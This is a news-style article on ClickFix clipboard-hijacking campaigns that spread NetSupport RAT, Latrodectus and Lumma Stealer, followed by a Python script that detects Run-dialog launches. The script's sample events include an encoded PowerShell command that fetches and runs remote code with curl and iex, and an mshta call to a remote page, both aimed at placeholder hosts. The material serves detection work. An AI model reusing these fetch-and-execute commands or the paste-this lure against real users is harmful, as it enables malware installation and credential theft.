Hackers Exploit ClickFix Techniques to Deploy NetSupport RAT, Latrodectus, and Lumma Stealer Malware

In the evolving landscape of cyber threats, a deceptive social engineering tactic known as ClickFix has emerged as a significant concern. First identified in late 2024, ClickFix has seen a dramatic increase in usage throughout the first half of 2025, becoming a prevalent method for cybercriminals to infiltrate systems.

Understanding ClickFix

ClickFix is a social engineering technique that manipulates users into executing malicious commands under the guise of resolving common computer issues. Unlike traditional methods that rely on exploit kits or malicious attachments, ClickFix leverages clipboard hijacking. Attackers inject obfuscated commands into a user’s clipboard and instruct them to paste and execute these commands using Windows shell shortcuts, such as Win+R or Win+X. Because the victim launches the command themselves, no exploit or attachment has to reach the endpoint, so controls that focus on those delivery vectors do not fire and the malware is deployed discreetly.

Recent Campaigns Utilizing ClickFix

Cybersecurity researchers have identified several campaigns employing ClickFix to distribute various malware families:

1. NetSupport RAT Distribution

In this campaign, attackers use loader domains that mimic legitimate services like DocuSign and Okta. Victims are directed to landing pages that prompt them to open the Run dialog (Win+R) and paste an injected PowerShell command. Executing this command downloads a ZIP archive containing a malicious DLL loader. This DLL sideloads itself via a legitimate Java executable (jp2launcher.exe), retrieves encrypted payloads using curl.exe, and ultimately launches NetSupport RAT’s client32.exe in memory.

2. Latrodectus Deployment

Another series of attacks combines ClickFix lures with ClearFake infrastructure. Victims visiting compromised websites are redirected to fake verification pages that inject an encoded PowerShell command into the clipboard. When executed, this command uses curl.exe to fetch a JavaScript downloader that retrieves an MSI installer. This installer sideloads Latrodectus as a malicious DLL (libcef.dll) within a legitimate process. The final DLL injects shellcode to harvest browser credentials and exfiltrate data to a remote server.

3. Lumma Stealer Propagation

A third wave of intrusions routes victims through typosquatted IP-logging domains to deliver Lumma Stealer. Each victim receives a unique MSHTA command that downloads a heavily obfuscated, Base64-encoded PowerShell script. This script drops and executes an AutoIt-based loader (PartyContinued.exe), which unpacks a CAB archive (Boat.pst) and constructs an AutoIt3 engine binary (Slovenia.com) to launch the Lumma payload. The loader then executes a series of command-line operations to extract, assemble, and run the stealer without further user interaction.

Mechanism of Infection via Clipboard Hijacking

At the core of the ClickFix vector is a technique known as pastejacking. Malicious JavaScript on a compromised webpage overwrites the user’s clipboard with an obfuscated command string and displays innocuous instructions to verify or fix an issue. When the user pastes this command into the Run dialog or terminal, they unwittingly execute a script that downloads and stages additional malicious components.

Implications and Recommendations

The rise of ClickFix underscores the need for heightened awareness and vigilance among users. To mitigate the risks associated with this technique, consider the following recommendations:

– User Education: Train users to recognize and avoid suspicious prompts that instruct them to copy and paste commands into system dialogs.

– Technical Safeguards: Implement security measures that can detect and block unauthorized script executions initiated through clipboard manipulation.

– Regular Updates: Keep all software and systems updated to patch vulnerabilities that could be exploited by such social engineering tactics.
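One way to put the Technical Safeguards recommendation into practice is to hunt for the launch pattern the three campaigns above share: a script host started from the Windows shell (explorer.exe is the parent of anything typed into the Run dialog) with a command line that carries an encoded PowerShell payload, a hidden window, curl.exe or mshta.exe fetching a URL, or Invoke-Expression. The following Python triage script is an added example, not code from the article or from the researchers it describes; the Sysmon-style field names (ParentImage, Image, CommandLine), the sample events and the example.invalid domains are constructed for illustration.

```python
"""Triage process-creation events for ClickFix-style launches.

Added example: heuristics run over constructed Sysmon-style events.
Field names, thresholds and sample values are assumptions, not vendor rules.
"""
import base64
import re

# Script hosts a pasted ClickFix command typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# Commands entered in the Run dialog (Win+R) are children of the shell.
SHELL_PARENT = "explorer.exe"

# Match the -EncodedCommand switch and its Base64 argument (PowerShell
# accepts any unambiguous prefix of the switch name, e.g. -e, -ec, -enc).
ENCODED_RX = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Indicators checked against the raw command line plus any decoded payload.
INDICATORS = [
    ("encoded_command", re.compile(
        r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("curl_download", re.compile(r"(?i)\bcurl(?:\.exe)?\b.*https?://")),
    ("mshta_remote", re.compile(r"(?i)\bmshta(?:\.exe)?\b.*https?://")),
    ("invoke_expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("base64_payload", re.compile(r"(?i)frombase64string")),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE Base64) or None."""
    match = ENCODED_RX.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_event(event):
    """Return a finding dict for a suspicious event, or None if it is benign."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]
    # Only shell-launched script hosts match the Run-dialog paste pattern.
    if parent != SHELL_PARENT or image not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(cmdline)
    # Indicators hidden inside the encoded payload are scanned after decoding.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    if not hits:
        return None
    return {"image": image, "indicators": hits, "decoded": decoded}


def triage(events):
    """Return (index, finding) pairs for every suspicious event."""
    findings = []
    for index, event in enumerate(events):
        finding = triage_event(event)
        if finding is not None:
            findings.append((index, finding))
    return findings


# Constructed sample events (not real telemetry).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_EXPLORER = r"C:\Windows\explorer.exe"
_ENCODED = base64.b64encode(
    "iex (curl.exe -s https://verify.example.invalid/fix.txt)"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # Win+R -> hidden, encoded PowerShell that pulls a payload with curl.exe
    {"ParentImage": _EXPLORER, "Image": _PS,
     "CommandLine": f"powershell -w hidden -NoP -enc {_ENCODED}"},
    # Win+R -> mshta loading a remote HTA
    {"ParentImage": _EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://ip-logger.example.invalid/verify"},
    # Scheduled maintenance script spawned by cmd.exe: benign
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": _PS,
     "CommandLine": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    # Win+R -> notepad: benign, not a script host
    {"ParentImage": _EXPLORER, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    # Win+R -> plain local PowerShell command: benign, no indicators
    {"ParentImage": _EXPLORER, "Image": _PS,
     "CommandLine": "powershell Get-Date"},
]

if __name__ == "__main__":
    for index, finding in triage(SAMPLE_EVENTS):
        print(f"event {index}: {finding['image']} -> {finding['indicators']}")
        if finding["decoded"]:
            print(f"  decoded payload: {finding['decoded']}")
```

Decoding the -EncodedCommand argument is the step that makes this useful: in the first sample event the curl.exe fetch and the iex call are invisible in the raw command line and surface only after the UTF-16LE Base64 payload is decoded. In production the same logic would read real process-creation telemetry rather than the embedded samples, and the parent-process condition should be widened to whichever terminal the Win+X menu opens in your environment.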

By understanding the mechanics of ClickFix and adopting proactive security practices, individuals and organizations can better protect themselves against this evolving cyber threat.